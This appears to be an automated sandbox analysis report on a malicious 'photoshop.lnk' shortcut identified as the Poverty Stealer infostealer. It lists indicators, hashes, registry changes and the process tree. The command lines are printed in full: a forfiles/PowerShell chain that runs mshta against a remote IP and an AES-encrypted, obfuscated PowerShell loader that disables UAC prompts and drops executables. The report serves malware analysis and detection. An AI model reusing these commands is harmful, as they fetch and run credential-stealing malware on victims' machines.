Analysis
-
max time kernel
147s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
04-03-2024 20:17
Static task
static1
General
-
Target
photoshop.lnk
-
Size
1KB
-
MD5
e0c8dc3509ab18f1feae1a35ee36a82a
-
SHA1
46560534976b84abe00123d821fbdfab148403e4
-
SHA256
704c6726ac624046f3a428f5dd6c1e461d9172cea5cdb313f176d361454a0419
-
SHA512
171db39c91a149735316379111572e267ab874cbf3925956afcc0fc2a1e0a57825f096aaf6d43fc5de03f6cce2822131ff9bf7c72204a7d8d38bd32a32844392
Malware Config
Extracted
http://91.92.251.35/Downloads/Lar/photoshop
Signatures
-
Detect Poverty Stealer Payload 1 IoCs
resource yara_rule behavioral1/files/0x0009000000023240-66.dat family_povertystealer -
Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 12 3076 mshta.exe 37 4932 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 2 IoCs
pid Process 2440 Photoshop_Set-Up.exe 3168 Lyrufos.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000800000002323f-55.dat upx behavioral1/files/0x000800000002323f-60.dat upx behavioral1/memory/2440-61-0x0000000000620000-0x0000000000F72000-memory.dmp upx behavioral1/memory/2440-101-0x0000000000620000-0x0000000000F72000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Vss\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3860 2440 WerFault.exe 98 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Photoshop_Set-Up.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Photoshop_Set-Up.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Photoshop_Set-Up.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Photoshop_Set-Up.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Photoshop_Set-Up.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Photoshop_Set-Up.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Photoshop_Set-Up.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION Photoshop_Set-Up.exe Set value (int) \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Photoshop_Set-Up.exe = "11001" Photoshop_Set-Up.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4468 powershell.exe 4468 powershell.exe 2336 powershell.exe 2336 powershell.exe 4932 powershell.exe 4932 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4468 powershell.exe Token: SeDebugPrivilege 2336 powershell.exe Token: SeDebugPrivilege 4932 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2440 Photoshop_Set-Up.exe 2440 Photoshop_Set-Up.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1488 wrote to memory of 3680 1488 cmd.exe 88 PID 1488 wrote to memory of 3680 1488 cmd.exe 88 PID 3680 wrote to memory of 4468 3680 forfiles.exe 89 PID 3680 wrote to memory of 4468 3680 forfiles.exe 89 PID 4468 wrote to memory of 3076 4468 powershell.exe 90 PID 4468 wrote to memory of 3076 4468 powershell.exe 90 PID 3076 wrote to memory of 2336 3076 mshta.exe 93 PID 3076 wrote to memory of 2336 3076 mshta.exe 93 PID 2336 wrote to memory of 4932 2336 powershell.exe 95 PID 2336 wrote to memory of 4932 2336 powershell.exe 95 PID 4932 wrote to memory of 2440 4932 powershell.exe 98 PID 4932 wrote to memory of 2440 4932 powershell.exe 98 PID 4932 wrote to memory of 2440 4932 powershell.exe 98 PID 4932 wrote to memory of 3168 4932 powershell.exe 99 PID 4932 wrote to memory of 3168 4932 powershell.exe 99 PID 4932 wrote to memory of 3168 4932 powershell.exe 99
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Lar/photoshop2⤵
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exestart mshta http://91.92.251.35/Downloads/Lar/photoshop3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Lar/photoshop4⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $Doaj = 'AAAAAAAAAAAAAAAAAAAAADers9PJ6xlLVT2iLiiCmurb7hNHS+bm86DyHQOtaEEHn6mCk19MuBdMWsWswZGThsWoEjZ3M2IsES6Ta+W7eVI9GxPAHKsNBidWfPy5Jjn8oHZyyldy5uSyuJqR6BazsmvPis8BD1Ize4UFUMayR+UuPK97pbXLIpdixkLzDaSaozRI+su8HTxng9oYCUT8SIDGymBlIPPirk5KwcONV5KcvEGukTi48N4QalFRoheMBLnNCEipodaLmqsqTkpccIJ1sPw/8VQXtaDtSA1nx84ZXPaN6n5x5gS8aGXXdNl80Zd3m3n+jitUAQyOjddZVJUDeL36NKWKafxmZm+IS5KvZJjwbefF0rKJWt3mHJkqzqnMZ/GZwZ7Kmo3FVHRTCMjDoGRBAuLu8bsHd/eweJH/4AuQzCNnMTbm48E8eLcZZMB+1whxlz3o1kHeLqzJFC9Ggbl+u/zoIrnRx6X8B7b5A49pT+vCVod664yu7QrgL5nd+wjhPfMFA5fg0OYvKWbOLaR+daXqVMNTy+pzKCw5btYcoWJwuD+Oq681f8H/BfFpvWqeFQTz0CLL5fezXgWH+exivRzoUVCrxT0lPKG2DMrpgYLKCri3FSvKlgJ8U/iFi+viwK6Ra4kWKteYdtMiB7yptDzhdtgfQDbDE4b7gUsRggRBiZ0an2eprwY+97rw+2bHOEnZDvJCtOayoCWdE27HcETLfLml9AlDAyw2UEqWWuFc0zxwh7lJEi/1k8jDiJu2oYs/ciElJIgjxZhz5HCeYAadPreeY32Ws0AX0FZbW2QREFOIuYJbUbsoC4JhyjWohB/lgSGx+UVx7AqKGYq110GBPcq9KM5W+df+J6s4vobxDlocNaSyV5NjiOIEcA+X9IDDoMVWpj7XDs3B6iVI2LkC0eQ9xOl2hPb9+Z7owOQeyyna6kpwr2ZKY/KhOaTUGHhCR7/y403W8Ne3HI6TmQRoFT4KtikNX5hdWYxrAr/bPpQsR4aoPm0Y';$lOdvDYPo = 'amJEcXN5b0lPZmRjc2xxQUhTbGtrdU5YTEtKeGFETHg=';$XTxbjY = New-Object 'System.Security.Cryptography.AesManaged';$XTxbjY.Mode = [System.Security.Cryptography.CipherMode]::ECB;$XTxbjY.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$XTxbjY.BlockSize = 128;$XTxbjY.KeySize = 256;$XTxbjY.Key = [System.Convert]::FromBase64String($lOdvDYPo);$lLqsN = [System.Convert]::FromBase64String($Doaj);$sXEuQEMv = $lLqsN[0..15];$XTxbjY.IV = $sXEuQEMv;$QHNqwuDDj = $XTxbjY.CreateDecryptor();$xXmWRVZMX = $QHNqwuDDj.TransformFinalBlock($lLqsN, 16, $lLqsN.Length - 16);$XTxbjY.Dispose();$VJJYW = New-Object System.IO.MemoryStream( , $xXmWRVZMX );$XqxWhNb = New-Object System.IO.MemoryStream;$LAISYiBmx = New-Object System.IO.Compression.GzipStream $VJJYW, ([IO.Compression.CompressionMode]::Decompress);$LAISYiBmx.CopyTo( $XqxWhNb );$LAISYiBmx.Close();$VJJYW.Close();[byte[]] $VlUkz = $XqxWhNb.ToArray();$DwCaBfh = [System.Text.Encoding]::UTF8.GetString($VlUkz);$DwCaBfh | powershell -5⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -6⤵
- UAC bypass
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe"C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe"7⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2440 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 18608⤵
- Program crash
PID:3860
-
-
-
C:\Users\Admin\AppData\Roaming\Lyrufos.exe"C:\Users\Admin\AppData\Roaming\Lyrufos.exe"7⤵
- Executes dropped EXE
PID:3168
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2440 -ip 24401⤵PID:380
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.2MB
MD5e96bb3da47f4a3319b80f23051bdeb16
SHA1c9913b052c5c7a59e100fe18357fddc1023161ea
SHA256d69d7e68a706c60146a5b530368d7818599dbd39d071f181963a89945cff3c29
SHA5126ac5bcdcdd2c70cb5094a6c985a81df520a6cf9f622c0697e00c0e3e4081cdb967f3da9df2a04072552dff2f70c43c9e84c2b6f3bf81f3720983859dff46f56e
-
Filesize
426B
MD5a28ab17b18ff254173dfeef03245efd0
SHA1c6ce20924565644601d4e0dd0fba9dde8dea5c77
SHA256886c0ab69e6e9d9d5b5909451640ea587accfcdf11b8369cad8542d1626ac375
SHA5129371a699921b028bd93c35f9f2896d9997b906c8aba90dd4279abba0ae1909a8808a43bf829584e552ccfe534b2c991a5a7e3e3de7618343f50b1c47cff269d6
-
Filesize
29KB
MD516db89328ce227006c153728c0ade1ae
SHA1effd7c2992e64fa2d266b92054d3dee5f1e950f5
SHA25669962181ff1d9d8f9dc80b1f91f8963aeb423f4e06f25ce3e81d22e16e1866ab
SHA5126e1f7094d0b7b5788c8f6bf211b452d417b1ad1a0720d0fe59b3ec9d1af978d0108acb0b53a6d002245603b68e607c5297f2c01ec18fcaf6634bae02b7c26fd5
-
Filesize
2.9MB
MD5c56adb18f4440a6c085141c508256cbd
SHA19ac2fef2d12260c1e717d8de61b8a42840a1cac4
SHA2561cde83baf8606ef1df93264cdfa6af9889fbe4bd03f5584df62119d048f7687a
SHA5124457a323d9d96383e525c796fb9d440ff9ab5827f0616b4a12ccf535e18985aa4972d6d62d29112b5a7e2bc82f567201d15ed9becac84bed5e2ee298c00d7429
-
Filesize
1.8MB
MD5b6f4b0ce8d68fa8a3d2ed69a50f4a8da
SHA1c8037db70d2c53f0efbc746efabf7968d6d09e1a
SHA256796c2a6de48e4206f14a87f6770990fd663423b2b1ce1ddef9a510123f2c5ead
SHA5127d0860bf32135f545352be88d2b942979fc56bc37e6fa58068fc40c205a2ddc9d1255f1785ceb4e361110482b44105c30116d72b7a9d955d68849a2d54093bb2